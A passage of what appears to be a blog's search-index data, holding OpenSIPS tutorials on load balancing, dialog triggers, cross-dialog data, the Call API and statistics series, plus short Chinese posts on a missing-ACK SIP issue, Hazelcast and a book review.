appropriated. For example, looking at the RURI (dialed number) you can see if the call must go to PSTN or if it a voicemail or conference number; also, by looking at the codecs advertised in the SDP, you can figure out if transcoding is or not also required.\nif (!load_balance(\u0026#34;1\u0026#34;,\u0026#34;transc;pstn\u0026#34;)) { sl_send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } The first parameter of the function identifies the LB set to be used (see the group_id column in the above DB snapshot). Second parameter is list of the required resource for the call. 
A third optional parameter may be passed to instruct the LB engine on how to estimate the load - in absolute value (how many channels are used) or in relative value (how many percentages are used).\nThe load_balance() will automatically create the dialog state for the call (in order to monitor it) and will also allocate the requested resources for it (from the selected box).\nThe function will set as destination URI ($du) the address of the selected destination/box.\nThe resources will be automatically released when the call terminates. The LB module provides an MI function that allows the admin to inspect the current load over the destinations.\n2.3 The LB logic The logic used by the LB module to select the destination is:\ngets the destination set based on the group_id (first parameter of the load_balance() function) selects from the set only the destinations that are able to provide the requested resources (second parameter of the load_balance() function) for the selected destinations, it evaluates the current load for each requested resource the winning destination is the one with the biggest value for the minimum available load per resource. 
Example:\n4 destinations/boxes in the LB set\noffers 30 channels for transcoding and 32 for PSTN offers 100 voicemail channels and 10 for transcoding offers 50 voicemail channels and 300 for conference offers 10 voicemail, 10 conference, 10 transcoding and 32 PSTN when calling load_balance(\u0026ldquo;1\u0026rdquo;,\u0026ldquo;transc;pstn\u0026rdquo;) -\u0026gt;\nonly boxes (1) and (4) will be selected, as they offer both transcoding and pstn evaluating the load : (1) transcoding - 10 channels used; PSTN - 18 used (4) transcoding - 9 channels used; PSTN - 16 used evaluating available load (capacity-load) : - (1) transcoding - 20 channels available; PSTN - 14 available - (4) transcoding - 1 channel available; PSTN - 16 available for each box, the minimum available load (through all resources) (1) 14 (PSTN) (4) 1 (transcoding) final selected box is (1) as it has the biggest (=14) available load for the most loaded resource.\nThe selection algorithm tries to avoid the intensive usage of a resource per box.\n2.4 Disabling and Pinging The Load Balancer module provides a couple of functionalities to help in dealing with failures of the destinations. The actual detection of a failed destination (based on the SIP traffic) is done in the OpenSIPS routing script by looking at the codes of the replies you receive back from the destinations (see the example at the end of the tutorial). Once a destination is detected as failed, in script, you can mark it as disabled via the lb_disable() function - once marked as disabled, the destination will not be used anymore in the LB process (it will not be considered a possible destination when routing calls). For a destination to be set back as enabled, there are two options:\nuse the MI command lb_status to do it manually, from outside OpenSIPS based on probing - the destination must have the SIP probing/pinging enabled - once the destination starts replying with 200 OK replies to the SIP pings (see the probing_reply_codes option). 
To enable pinging, you need first to set probing_interval to a non zero value - how often the pinging should be done. The pinging will be done by periodically sending a OPTIONS SIP request to the destination - see probing_method option.To control which and when a destination is pinged, there is the probe_mode column in the load_balancer table - see table definition. Possible options are:\n0 no pinging at any time 1 ping only if in disabled state (used for auto re-enabling of destinations) 2 ping all the time - it will disable destination if fails to answer to pings and enable it back when starts answering again. 2.5 RealTime Control over the Load Balancer The Load Balancer module provides several MI functions to allow you to do runtime changes and to get realtime information from it.Pushing changes at runtime:\nlb_reload - force reloading the entire configuration data from DB - see more.. lb_resize - change the capacity of a resource for a destination - see more.. lb_status - change the status of a destination (enable/disable) - see more.. For fetching realtime information :\nlb_list - list the load on all destinations (per resource) - see more.. lb_status - see the status of a destination (enable/disable) - see more.. 3. Study Case: routing the media gateways Here is the full configuration and script for performing LB between media peers.\n3.1 Configuration Let\u0026rsquo;s consider the following case: a cluster of media servers providing voicemail service and PSTN (in and out) service. 
So the boxes will be able to receive calls for Voicemail or for PSTN termination, but they will be able to send back calls only for PSTN inbound.\nWe also want the destinations to be disabled from script (when a failure is detected); The re-enabling of the destinations will be done based on pinging - we do pinging only when the destination is in \u0026ldquo;failed\u0026rdquo; status.\n4 destinations/boxes in the LB set\noffers 50 channels for voicemail and 32 for PSTN offers 100 voicemail channels offers 50 voicemail channels offers 10 voicemail and 64 PSTN This translated into the following setup:\nid group_id dst_uri resources prob_mode 1 1 sip:yate1.mycluster.net vm=50; pstn=32 1 2 1 sip:yate2.mycluster.net vm=100 1 3 1 sip:yate3.mycluster.net vm=50 1 4 1 sip:yate4.mycluster.net vm=10;pstn=64 1 3.2 OpenSIPS Scripting debug=1 memlog=1 fork=yes children=2 log_stderror=no log_facility=LOG_LOCAL0 disable_tcp=yes disable_dns_blacklist = yes auto_aliases=no check_via=no dns=off rev_dns=off listen=udp:xxx.xxx.xxx.xxx:5060 # REPLACE here with right values loadmodule \u0026#34;modules/maxfwd/maxfwd.so\u0026#34; loadmodule \u0026#34;modules/sl/sl.so\u0026#34; loadmodule \u0026#34;modules/db_mysql/db_mysql.so\u0026#34; loadmodule \u0026#34;modules/tm/tm.so\u0026#34; loadmodule \u0026#34;modules/uri/uri.so\u0026#34; loadmodule \u0026#34;modules/rr/rr.so\u0026#34; loadmodule \u0026#34;modules/dialog/dialog.so\u0026#34; loadmodule \u0026#34;modules/mi_fifo/mi_fifo.so\u0026#34; loadmodule \u0026#34;modules/mi_xmlrpc/mi_xmlrpc.so\u0026#34; loadmodule \u0026#34;modules/signaling/signaling.so\u0026#34; loadmodule \u0026#34;modules/textops/textops.so\u0026#34; loadmodule \u0026#34;modules/sipmsgops/sipmsgops.so\u0026#34; loadmodule \u0026#34;modules/load_balancer/load_balancer.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;dialog\u0026#34;, \u0026#34;db_mode\u0026#34;, 1) 
modparam(\u0026#34;dialog\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;rr\u0026#34;,\u0026#34;enable_double_rr\u0026#34;,1) modparam(\u0026#34;rr\u0026#34;,\u0026#34;append_fromtag\u0026#34;,1) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # ping every 30 secs the failed destinations modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_interval\u0026#34;, 30) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_from\u0026#34;, \u0026#34;sip:pinger@LB_IP:LB_PORT\u0026#34;) # consider positive ping reply the 404 modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_reply_codes\u0026#34;, \u0026#34;404\u0026#34;) route{ if (!mf_process_maxfwd_header(\u0026#34;3\u0026#34;)) { send_reply(\u0026#34;483\u0026#34;,\u0026#34;looping\u0026#34;); exit; } if ( has_totag() ) { # sequential request -\u0026gt; obey Route indication loose_route(); t_relay(); exit; } # handle cancel and re-transmissions if ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) t_relay(); exit; } # from now on we have only the initial requests if (!is_method(\u0026#34;INVITE\u0026#34;)) { send_reply(\u0026#34;405\u0026#34;,\u0026#34;Method Not Allowed\u0026#34;); exit; } # initial request record_route(); # not really necessary to create the dialog from script (as the # LB functions will do this for us automatically), but we do it # if we want to pass some flags to dialog (pinging, bye, etc) create_dialog(\u0026#34;B\u0026#34;); # check the direction of call if ( lb_is_destination(\u0026#34;$si\u0026#34;,\u0026#34;$sp\u0026#34;,\u0026#34;1\u0026#34;) ) { # call comes from our cluster, so it is an PSNT inbound call # mark it as load on the corresponding destination lb_count_call(\u0026#34;$si\u0026#34;,\u0026#34;$sp\u0026#34;,\u0026#34;1\u0026#34;, \u0026#34;pstn\u0026#34;); # and route is to 
our main sip server to send call to end user $du = \u0026#34;sip:PROXY_IP:PORXY_PORT\u0026#34;; # REPLACE here with right values t_relay(); exit; } # detect resources and store in an AVP if ( $rU=~\u0026#34;^VM_\u0026#34; ) { # looks like a VoiceMail call $avp(lb_res) = \u0026#34;vm\u0026#34;; } else if ( $rU=~\u0026#34;^[0-9]+$\u0026#34; ) { # PSTN call $avp(lb_res) = \u0026#34;pstn\u0026#34;; } else { send_reply(\u0026#34;404\u0026#34;,\u0026#34;Destination not found\u0026#34;); exit; } # LB function returns negative if no suitable destination (for requested resources) is found, # or if all destinations are full if ( !load_balance(\u0026#34;1\u0026#34;,\u0026#34;$avp(lb_res)\u0026#34;) ) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } xlog(\u0026#34;Selected destination is: $du\\n\u0026#34;); # arm a failure route for be able to catch a failure event and to do # failover to the next available destination t_on_failure(\u0026#34;LB_failed\u0026#34;); # send it out if (!t_relay()) { sl_reply_error(); } } failure_route[LB_failed] { # skip if call was canceled if (t_was_cancelled()) { exit; } # was a destination failure ? 
(we do not want to do failover # if it was a call setup failure, so we look for 500 and 600 # class replied and for local timeouts) if ( t_check_status(\u0026#34;[56][0-9][0-9]\u0026#34;) || (t_check_status(\u0026#34;408\u0026#34;) \u0026amp;\u0026amp; t_local_replied(\u0026#34;all\u0026#34;) ) ) { # this is a case for failover xlog(\u0026#34;REPORT: LB destination $du failed with code $T_reply_code\\n\u0026#34;); # mark failed destination as disabled lb_disable(); # try to re-route to next available destination if ( !load_balance(\u0026#34;1\u0026#34;,\u0026#34;$avp(lb_res)\u0026#34;) ) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } xlog(\u0026#34;REPORT: re-routing call to $du \\n\u0026#34;); t_relay(); } } ","permalink":"https://wdd.js.org/opensips/blog/load-balance/","summary":"https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9\n1. Load Balancing in OpenSIPS The \u0026ldquo;load-balancing\u0026rdquo; module comes to provide traffic routing based on load. Shortly, when OpenSIPS routes calls to a set of destinations, it is able to keep the load status (as number of ongoing calls) of each destination and to choose to route to the less loaded destination (at that moment). 
OpenSIPS is aware of the capacity of each destination - it is pre-configured with the maximum load accepted by the destinations.","title":"Load Balancing in OpenSIPS"},{"content":"通过sngrep抓包发现,通话正常,ACK无法送到FS。导致通话一段时间后,FS因为没有收到ACK,就发送了BYE来挂断呼叫。\nsngrep定位到问题可能出在OpenSIPS上,然后分析opensips的日志。\nMar 9 16:58:00 dd opensips[84]: ERROR:dialog:dlg_validate_dialog: failed to validate remote contact: dlg=[sip:9999@192.168.2.161:5080;transport=udp] , req =[sip:192.168.2.109:18627;lr;ftag=CX3CDinLARXn1ZRNIlPaFexgirQczdr7;did=4c1.a9657441] 上面的日志,提示问题出在dialog验证上,dialog验证失败的原因可能与contact头有关。\n然后我又仔细地分析了一下SIP抓包。发现contact中的ip地址192.168.2.161并不是fs的地址。但是它为什么会出现在fs回的200ok中呢?\n这时我就想起了fs vars.xml,其中有几个参数是用来配置服务器的ip地址的。\n由于我的fs是个树莓派,ip是自动分配的,重启之后,可能获取了新的ip。但是老的ip地址,还是存在于vars.xml中。\n然后我就去排查了一下fs的vars.xml, 发现下面三个参数都是192.168.2.161, 但是实际上树莓派的地址已经不是这个了。\nbind_server_ip external_rtp_ip external_sip_ip 解决方案:改变fs vars.xml中的地址配置信息,然后重启fs。\n除了fs的原因,还有一部分原因可能是错误地使用了fix_nated_contact。务必记住:对于位于边界的SIP服务器来说,对于进入的SIP请求,一般需要fix_nated_contact。对于这个请求的响应,则不需要进行nat处理。\n深入思考一下,为什么contact头修改错了,往往ack就会有问题呢? 
实际上ack请求的url部分,就是来自响应消息的contact头的url部分。\n","permalink":"https://wdd.js.org/opensips/ch7/miss-ack/","summary":"通过sngrep抓包发现,通话正常,ACK无法送到FS。导致通话一段时间后,FS因为没有收到ACK,就发送了BYE来挂断呼叫。\nsngrep定位到问题可能出在OpenSIPS上,然后分析opensips的日志。\nMar 9 16:58:00 dd opensips[84]: ERROR:dialog:dlg_validate_dialog: failed to validate remote contact: dlg=[sip:9999@192.168.2.161:5080;transport=udp] , req =[sip:192.168.2.109:18627;lr;ftag=CX3CDinLARXn1ZRNIlPaFexgirQczdr7;did=4c1.a9657441] 上面的日志,提示问题出在dialog验证上,dialog验证失败的原因可能与contact头有关。\n然后我又仔细地分析了一下SIP抓包。发现contact中的ip地址192.168.2.161并不是fs的地址。但是它为什么会出现在fs回的200ok中呢?\n这时我就想起了fs vars.xml,其中有几个参数是用来配置服务器的ip地址的。\n由于我的fs是个树莓派,ip是自动分配的,重启之后,可能获取了新的ip。但是老的ip地址,还是存在于vars.xml中。\n然后我就去排查了一下fs的vars.xml, 发现下面三个参数都是192.168.2.161, 但是实际上树莓派的地址已经不是这个了。\nbind_server_ip external_rtp_ip external_sip_ip 解决方案:改变fs vars.xml中的地址配置信息,然后重启fs。\n除了fs的原因,还有一部分原因可能是错误地使用了fix_nated_contact。务必记住:对于位于边界的SIP服务器来说,对于进入的SIP请求,一般需要fix_nated_contact。对于这个请求的响应,则不需要进行nat处理。\n深入思考一下,为什么contact头修改错了,往往ack就会有问题呢? 实际上ack请求的url部分,就是来自响应消息的contact头的url部分。","title":"ACK 无法正常送到FS"},{"content":"","permalink":"https://wdd.js.org/posts/2021/03/ewinve/","summary":"","title":"stompjs 心跳机制调研"},{"content":"IMDG是 IN-MEMORY DATA GRID的缩写。\n官方的一句话介绍:\nThe industry\u0026rsquo;s fastest, most scalable in-memory data grid, where speed, scalability and continuous processing are the core requirements for deployment.\n抽取关键词:\n快 可伸缩 内存 分布式 简介 An IMDG (in-memory data grid) is a set of networked/clustered computers that pool together their random access memory (RAM) to let applications share data structures with other applications running in the cluster.\nThe primary advantage is speed, which has become critical in an environment with billions of mobile, IoT devices and other sources continuously streaming data. With all relevant information in RAM in an IMDG, there is no need to traverse a network to remote storage for transaction processing. The difference in speed is significant – minutes vs. 
sub-millisecond response times for complex transactions done millions of times per second.\n参考 https://hazelcast.com/products/imdg/ 管理中心 https://github.com/hazelcast/management-center-docker https://github.com/hazelcast/hazelcast-docker https://github.com/hazelcast/hazelcast-nodejs-client/blob/master/DOCUMENTATION.md https://docs.hazelcast.com/imdg/latest/clusters/discovering-by-tcp.html 文档 https://docs.hazelcast.com/imdg/latest/clusters/discovering-by-tcp.html ","permalink":"https://wdd.js.org/posts/2021/02/xlwnvv/","summary":"IMDG是 IN-MEMORY DATA GRID的缩写。\n官方的一句话介绍:\nThe industry\u0026rsquo;s fastest, most scalable in-memory data grid, where speed, scalability and continuous processing are the core requirements for deployment.\n抽取关键词:\n快 可伸缩 内存 分布式 简介 An IMDG (in-memory data grid) is a set of networked/clustered computers that pool together their random access memory (RAM) to let applications share data structures with other applications running in the cluster.\nThe primary advantage is speed, which has become critical in an environment with billions of mobile, IoT devices and other sources continuously streaming data.","title":"hazelcast IMDG"},{"content":"","permalink":"https://wdd.js.org/posts/2021/02/egkbht/","summary":"","title":"macbook pro 1708 换电池记录"},{"content":"人类将以什么方式走向灭绝,很多科幻电影中都有过设想。\n最近读到一本书《人类灭绝》,来自日本作家高野和明的科幻小说,给出了系统的介绍。小说中有一份报告,叫做《海斯曼报告》。\n下面表格中的1-5是报告中提到的人类灭绝方式,6-7是我自己添加。\n种类 类别 举例 相关电影,或者书籍 1 宇宙规模的灾难 小行星撞地球,太阳燃尽 2 地球规模的环境变动 地球磁场的南北逆转现象,环境污染 《2012》《后天》 3 核战 二战 日本 核武器 4 疫病 病毒威胁 生物武器 电影生化危机,今年的新冠肺炎疫情,HIV 《生化危机》《行尸走肉》 5 人类进化 由于基因突变,产生更加智能的人类 《东京食尸鬼》《人类灭绝》 6 AI失控 人工智能出现自我意识 《我,机器人》《终结者系列》《黑客帝国系列》 7 外星人入侵 高层次文明入侵低层次文明 《三体》 与三体不同的是,作者从人类第5种可能性展开小说。如果你喜欢三体的话,《人类灭绝》这本小说,也是非常值得一读的。\n","permalink":"https://wdd.js.org/posts/2021/02/ploder/","summary":"人类将以什么方式走向灭绝,很多科幻电影中都有过设想。\n最近读到一本书《人类灭绝》,来自日本作家高野和明的科幻小说,给出了系统的介绍。小说中有一份报告,叫做《海斯曼报告》。\n下面表格中的1-5是报告中提到的人类灭绝方式,6-7是我自己添加。\n种类 类别 举例 相关电影,或者书籍 1 宇宙规模的灾难 小行星撞地球,太阳燃尽 2 地球规模的环境变动 地球磁场的南北逆转现象,环境污染 《2012》《后天》 3 核战 二战 
日本 核武器 4 疫病 病毒威胁 生物武器 电影生化危机,今年的新冠肺炎疫情,HIV 《生化危机》《行尸走肉》 5 人类进化 由于基因突变,产生更加智能的人类 《东京食尸鬼》《人类灭绝》 6 AI失控 人工智能出现自我意识 《我,机器人》《终结者系列》《黑客帝国系列》 7 外星人入侵 高层次文明入侵低层次文明 《三体》 与三体不同的是,作者从人类第5种可能性展开小说。如果你喜欢三体的话,《人类灭绝》这本小说,也是非常值得一读的。","title":"人类灭绝的7种方式"},{"content":"原文:https://blog.opensips.org/2020/05/18/cross-dialog-data-accessing/\nThere are several calling scenarios – typical Class V – where multiple SIP dialogs may be involved. And to make it work, you need, from one dialog, to access the data that belongs to another dialog. By data we mean here dialog specific data, like dialog variables, profiles or flags, and, even more, accounting data (yes, the accounting engine is so powerful that it ended up being used for storing a lot of information during the calls). Let’s take a quick look at a couple of such scenarios:\nattended call transfer – the new call may need to import data (about the involved parties) from the old dialog; call parking – the retrieving call will need to import a lot of data (again, about the parties involved and the nature of the call) from the parked call call pickup – the picking up call will also have to access data from the ringing calls in order to find them, check permissions and grab one call. Scratching the surface, before OpenSIPS 3.1 The pre 3.1 OpenSIPS versions had some limited possibilities when it comes to accessing the data from other dialogs. Historically speaking, the first attempt was the get_dialog_info() function, a quite primitive approach that allows you, using the dialog variables, to find a dialog and to retrieve from it only one dialog variable. 
Even so, this function served the purpose of addressing scenarios where you wanted to group dialogs around custom values – this solved the problem of a front-end OpenSIPS balancer trying to group all calls of a conf room on the same conf server, or trying to group the calls of a user on the same PBX (so call transfer will work). But there were some limitations in terms of scalability (only one value was retrieved) and usage, on how the dialogs were referred (by dlg variables, not by the more natural call-id). So we had the next wave of functions that addressed those issues: the get_dialog_vals(), get_dialogs_by_val() or get_dialogs_by_profile() functions. They solved somehow the problem, allowing a more versatile way of referring/identifying the dialogs and allowing a bulk access to the dialog data, but still, not all dialog data was accessible and the way the data was returned (in complex arrays or json strings) makes them difficult to use.\nThe true solution, with OpenSIPS 3.1 So back to the drawing board. And the correct solution to the problem (of inter dialog data accessing) came from a totally different, much simpler approach – give direct access to the dialog context, so every piece of dialog data will be accessible via the regular dialog functions/variables/profiles/flags/etc. So, OpenSIPS 3.1 gives you the possibility to load the context of a different dialog, so you can retrieve whatever data without the need of additional functions or special data packing or re-formatting. Two simple functions were added, the load_dialog_ctx() and unload_dialog_ctx(). These two functions may be used to define a region in your script where “you see” a different dialog than the current one (dictated by the SIP traffic). Inside that region, all the dialog functions and variables will operate on the other dialog. 
Simple and very handy, right ?To make it even better, the OpenSIPS 3.1 gives you more than only the access to another dialog context – it gives you the possibility to**_ access the accounting context of another call_**. Shortly, you can access the accounting variables (extra data or per-leg data) of a different call – isn’t that cool ?This can be done via the acc_load_ctx_from_dlg() and acc_unload_ctx_from_dlg() functions, in the similar way to the loading/unloading the dialog context. Inside the region defined by these new accounting function, you will “see” the accounting data of another call.\nExample Let’s take the example of an attended transfer, when handling the transferring call. This snippet will show we can get access to various dialog and accounting data from the transferred dialog , while handling the transferring dialog.\n","permalink":"https://wdd.js.org/opensips/blog/cross-dialog-data/","summary":"原文:https://blog.opensips.org/2020/05/18/cross-dialog-data-accessing/\nThere are several calling scenarios – typical Class V – where multiple SIP dialogs may be involved. And to make it work, you need, from one dialog, to access the data that belongs to another dialog. 
By data we mean here dialog-specific data, like dialog variables, profiles or flags, and, even more, accounting data (yes, the accounting engine is so powerful that it ended up being used for storing a lot of information during the calls).","title":"Cross-dialog data accessing"},{"content":"原文:https://blog.opensips.org/2020/05/26/dialog-triggers-or-how-to-control-the-calls-from-script/\nThe OpenSIPS script is a very powerful tool, both in terms of capabilities (statements, variables, transformations) and in terms of integration (support for DB, REST, Events and more).So why not use the OpenSIPS script (or the script routes) to interact and control your call, in order to build more complex services on top of the dialog support?For this purpose, OpenSIPS 3.1 introduces three new per-dialog triggers:\non_answer route, triggered when the dialog is answered; on_timeout route, triggered when the dialog is about to timeout; on_hangup route, triggered after the dialog was terminated. The routes are optional and per-dialog and they give you the possibility to attach custom operations to the various critical milestones in a dialog’s life.While the on_answer and on_hangup routes are 100% data-manipulation oriented (you have full read/write access to the full data context of the dialog, but you cannot change anything about the dialog progress), the on_timeout route is a bit more versatile – by increasing the dialog’s timeout, you can dynamically increase the dialog lifetime (to postpone the dialog timeout, without waiting for any signalling to do it).But let’s talk example 🙂\nSimple PrePaid Using the on_timeout route, we can simulate the incremental check and charge behavior of a basic prepaid.For example, we set 5 seconds timeout for the dialog and when the on_timeout route is triggered (after the 5 secs), we can re-check if the caller still has credit to continue the call. If not, we leave the call to timeout, to be terminated by OpenSIPS. 
If he still has credit, we deduct the cost for 5 more secs and we increase the dialog timeout by 5 more seconds. Simple, right?\nroute { .... create_dialog(\u0026#34;B\u0026#34;); # remember some billing account id, to remember # where to check for credit $dlg_val(account_id) = \u0026#34;...\u0026#34;; # keep a running cost for the call also $dlg_val(total_cost) = 0; # start with an initial 5 seconds duration $DLG_timeout = 5; t_on_timeout(\u0026#34;call_recheck\u0026#34;); t_on_hangup(\u0026#34;call_terminated\u0026#34;); .... } route[call_recheck] { # the dialog data (vars, flags, profiles) are accessible here. xlog(\u0026#34;[$DLG_id] dialog timeout triggered\\n\u0026#34;); # calculate the cost for the next 5 seconds $var(cost) = 5 * .... ; # use a critical/locked region to do test and update upon the credit get_dynamic_lock( \u0026#34;$dlg_val(account_id)\u0026#34; ); if (avp_db_query(\u0026#34;select credit from accounts where credit\u0026gt;=$var(cost) and id=$dlg_val(account_id)\u0026#34;)) { # credit is still available avp_db_query(\u0026#34;update accounts set credit=credit-$var(cost) where id=$dlg_val(account_id)\u0026#34;); # give the dialog 5 more seconds $DLG_timeout = 5; # update the total cost $dlg_val(total_cost) = $(dlg_val(total_cost){s.int}) + $var(cost); } else { # query returned nothing, so no credit is available, allow the call # to timeout and terminate right away } release_dynamic_lock( \u0026#34;$dlg_val(account_id)\u0026#34; ); } route[call_terminated] { # the dialog data (vars, flags, profiles) are accessible here. 
xlog(\u0026#34;[$DLG_id] call terminated after $DLG_lifetime seconds with a cost of $dlg_val(total_cost)\\n\u0026#34;); # IMPROVEMENT - eventually adjust the call if the call didn\u0026#39;t use # the whole span of the last 5 seconds } ","permalink":"https://wdd.js.org/opensips/blog/dialog-trigers/","summary":"原文:https://blog.opensips.org/2020/05/26/dialog-triggers-or-how-to-control-the-calls-from-script/\nThe OpenSIPS script is a very powerful tool, both in terms of capabilities (statements, variables, transformations) and in terms of integration (support for DB, REST, Events and more).So why not use the OpenSIPS script (or the script routes) to interact and control your call, in order to build more complex services on top of the dialog support?For this purpose, OpenSIPS 3.1 introduces three new per-dialog triggers:\non_answer route, triggered when the dialog is answered; on_timeout route, triggered when the dialog is about to timeout; on_hangup route, triggered after the dialog was terminated.","title":"Dialog triggers, or how to control the calls from script"},{"content":" 看来OpenSIPS的目标已经不仅仅局限于做代理了,而是想做呼叫控制。\n原文:https://blog.opensips.org/2020/06/11/calls-management-using-the-new-call-api-tool/\nThe new Call API project consists of a standalone server able to serve a set of API commands that can be used to control SIP calls (such as start a new call, put a call on hold, transfer it to a different destination, etc.). In order to provide high performance throughput, the server has been developed in the Go programming language, and provides a WebSocket interface that is able to handle Json-RPC 2.0 requests and notifications.Although it runs as a standalone daemon able to control calls, it does not directly interact with SIP calls, but just communicates with a SIP proxy that actually provides the SIP stack and intermediates the calls. 
The first release of the Call API is using OpenSIPS for this purpose, but this is a loose requirement – in the future other SIP stacks can be used, with the appropriate connectors.\nArchitecture In terms of architecture, the new Call API tool consists of multiple units, the most important ones being:\nClients interface – this unit is responsible for receiving Json-RPC requests over WebSocket from clients and passing them to the Commands unit Management interface – this is the unit that communicates with the SIP proxy in order to instruct what needs to be done Event interface – listens for events from the SIP proxy and passes them to the Commands unit Commands unit – this is the unit that implements the commands logic, ensuring the interaction between all the above interfaces. Communication between these units is done asynchronously using goroutines. Below you can find a diagram that shows how all these units are interconnected\nDemo Below you can watch a video that shows how you can use some of the features the Call API tool provides, such as:\nStart a call between two participants Put the call on hold Resume the call from hold Transfer a call to a different destination Terminate an ongoing call Enjoy watching!\n","permalink":"https://wdd.js.org/opensips/blog/calls-manager/","summary":"看来OpenSIPS的目标已经不仅仅局限于做代理了,而是想做呼叫控制。\n原文:https://blog.opensips.org/2020/06/11/calls-management-using-the-new-call-api-tool/\nThe new Call API project consists of a standalone server able to serve a set of API commands that can be used to control SIP calls (such as start a new call, put a call on hold, transfer it to a different destination, etc.). 
In order to provide high performance throughput, the server has been developed in the Go programming language, and provides a WebSocket interface that is able to handle Json-RPC 2.","title":"Calls management using the new Call API tool"},{"content":" 早期1x和2x版本的OpenSIPS,统计模块只有两种模式,一种是计算值,另一种是从运行开始的累加值。而无法获取比如说最近一分钟,最近5分钟,这样的基于一定周期的统计值,在OpenSIPS 3.2上,提供了新的解决方案。\n原文:https://blog.opensips.org/2021/02/02/improved-series-based-call-statistics-using-opensips-3-2/\nReal-time call statistics is an excellent tool to evaluate the quality and performance of your telephony platform, that is why it is very important to expose as many statistics as possible, accumulated over different periods of time.OpenSIPS provides an easy to use interface that exposes simple primitives for creating, updating, and displaying various statistics, both well defined as well as tailored to your needs. However, the current implementation comes with a limitation: statistics are gathered starting from the beginning of the execution, up to the point they are read. In other words, you cannot gather statistics only for a limited time frame.That is why starting with OpenSIPS 3.2, the statistics module was enhanced with a new type of statistics, namely statistics series, that allow you to provide custom stats accumulated over a specific time window (such as one second, one minute, one hour, etc.). When the stat is evaluated, only the values gathered within the specified time window are accounted, all the others are simply dropped (similar to a time-based circular buffer, or a sliding window). 
Using these new stats, you can easily provide standard statistics such as ACD, AST, PDD, ASR, NER, CCR in a per minute/hour fashion.\nProfiles In order to use the statistics series you first need to define a statistics profile, which describes certain properties of the statistics to be used, such as:\nthe duration of the time frame to be used – the number of seconds worth of data that should be accumulated for the statistics that use this profile; all data gathered outside of this time window is discarded the granularity of the time window – the number of slots used for each series – the more slots, the more accurate the statistic is, with a penalty of an increased memory footprint how to group statistics to make them easier to process the processing algorithm – or how data should be accumulated and interpreted when the statistic is evaluated; this is presented in the next chapter The profile needs to be specified every time data is pushed into a statistics series, so that the engine knows how to process it.\nAlgorithms The statistics series algorithm describes how the data gathered over the specified time window should be processed. 
There are several algorithms available:\naccumulate – this is useful when you want to count the number of times a specific event appears (such as number of requests, replies, dialogs, etc); for this algorithm, the statistic is represented as a simple counter that accumulates when data is fed, and is decreased when data (out of the sliding window) expires average – this is used to compute an average value over the entire window frame; this is useful to compute average call duration (ACD) or average post dial delay (PDD) over a specified time window percentage – used to compute the percentage of some data out of a total number of entries; useful to compute different types of ratios, such as Answer-seizure ratio (ASR), NER or CCR Usage The new functionality can be leveraged by defining one (or more) stat_series_profiles, and then feeding data to that statistic according to your script’s logic using the update_stat_series() function. In order to evaluate the result of the stats, one can use the $stat() variable from within OpenSIPS’s script, or access it from outside using the get_statistics MI command.As a quick theoretical example, let us consider creating two statistics: one that counts the number of initial INVITE requests per minute your platform receives, and another one that shows the ratio of the INVITE requests out of all the other requests received.First, we shall define the two profiles that describe how the new statistics should be interpreted: the first one should be a counter that accumulates all the initial INVITEs received in one minute, and the second one should be a percentage series, incremented for initial INVITEs and decremented for all the others. 
Both statistics series will use a 60s (one minute) window:modparam(\u0026ldquo;statistics\u0026rdquo;, \u0026ldquo;stat_series_profile\u0026rdquo;, \u0026ldquo;inv_acc_per_min: algorithm=accumulate window=60\u0026rdquo;)modparam(\u0026ldquo;statistics\u0026rdquo;, \u0026ldquo;stat_series_profile\u0026rdquo;, \u0026ldquo;inv_perc_per_min: algorithm=percentage window=60\u0026rdquo;)Now, in the main route, we shall update statistics with data:\u0026hellip;route { \u0026hellip; if (is_method(\u0026ldquo;INVITE\u0026rdquo;) \u0026amp;\u0026amp; !has_totag()) { update_stat_series(\u0026ldquo;inv_acc_per_min\u0026rdquo;, \u0026ldquo;INVITE_per_min\u0026rdquo;, \u0026ldquo;1\u0026rdquo;); update_stat_series(\u0026ldquo;inv_perc_per_min\u0026rdquo;, \u0026ldquo;INVITE_ratio\u0026rdquo;, \u0026ldquo;1\u0026rdquo;); } else { update_stat_series(\u0026ldquo;inv_perc_per_min\u0026rdquo;, \u0026ldquo;INVITE_ratio\u0026rdquo;, \u0026ldquo;-1\u0026rdquo;); } xlog(\u0026ldquo;INVITEs per min $stat(INVITE_per_min) represents $stat(INVITE_ratio)% of total requests\\n\u0026rdquo;); \u0026hellip;}\u0026hellip;You can query these statistics through the MI interface by running:opensips-cli -x mi get_statistics INVITE_per_min INVITE_ratio\nUse case In a production environment, the KPIs you provide your customers are very important, as they describe the quality of the service you provide. Some of these are quite standard indices (ACD, ASR, AST, PDD, NER, CCR), that are relevant for specific periods of time (one minute, ten minutes, one hour). In the following paragraphs we will see how we can provide these statistics on a customer basis, as well as overall.First, we need to understand what each stat represents, to understand the logic that has to be scripted:\nASR (Answer Seizure Ratio) – the percentage of telephone calls which are answered (200 reply status code) CCR (Call Completion Ratio) – the percentage of telephone calls which are signaled back by the far-end client. 
